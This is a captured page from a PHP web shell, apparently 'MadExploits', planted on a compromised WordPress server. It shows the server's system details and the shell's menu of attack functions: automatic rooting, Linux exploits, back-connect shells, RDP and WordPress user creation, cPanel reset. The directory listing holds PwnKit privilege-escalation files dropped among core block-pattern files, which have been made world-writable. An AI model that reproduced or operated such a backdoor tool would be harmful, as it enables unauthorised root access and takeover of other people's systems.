Linux 700ba4e1d92d 5.15.0-1084-aws #91~20.04.1-Ubuntu SMP Fri May 2 06:59:36 UTC 2025 x86_64
Apache/2.4.67 (Debian)
: 172.18.0.2 | : 216.73.217.30
Cant Read [ /etc/named.conf ]
8.2.31
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
wp-includes /
block-patterns /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
navigation-overlay-accent-bg.p...
2.21
KB
-rwxrwxrwx
navigation-overlay-black-bg.ph...
1.95
KB
-rwxrwxrwx
navigation-overlay-centered-wi...
3.27
KB
-rwxrwxrwx
navigation-overlay-centered.ph...
1.63
KB
-rwxrwxrwx
navigation-overlay.php
1.35
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
query-grid-posts.php
972
B
-rwxrwxrwx
query-large-title-posts.php
1.94
KB
-rwxrwxrwx
query-medium-posts.php
1.03
KB
-rwxrwxrwx
query-offset-posts.php
1.96
KB
-rwxrwxrwx
query-small-posts.php
1.15
KB
-rwxrwxrwx
query-standard-posts.php
808
B
-rwxrwxrwx
social-links-shared-background...
951
B
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : social-links-shared-background-color.php
<?php /** * Social links with a shared background color. * * @package WordPress * @since 5.8.0 * @deprecated 6.7.0 This pattern is deprecated. Please use the Social Links block instead. */ return array( 'title' => _x( 'Social links with a shared background color', 'Block pattern title' ), 'categories' => array( 'buttons' ), 'blockTypes' => array( 'core/social-links' ), 'viewportWidth' => 500, 'content' => '<!-- wp:social-links {"customIconColor":"#ffffff","iconColorValue":"#ffffff","customIconBackgroundColor":"#3962e3","iconBackgroundColorValue":"#3962e3","className":"has-icon-color"} --> <ul class="wp-block-social-links has-icon-color has-icon-background-color"><!-- wp:social-link {"url":"https://wordpress.org","service":"wordpress"} /--> <!-- wp:social-link {"url":"#","service":"chain"} /--> <!-- wp:social-link {"url":"#","service":"mail"} /--></ul> <!-- /wp:social-links -->', );
Close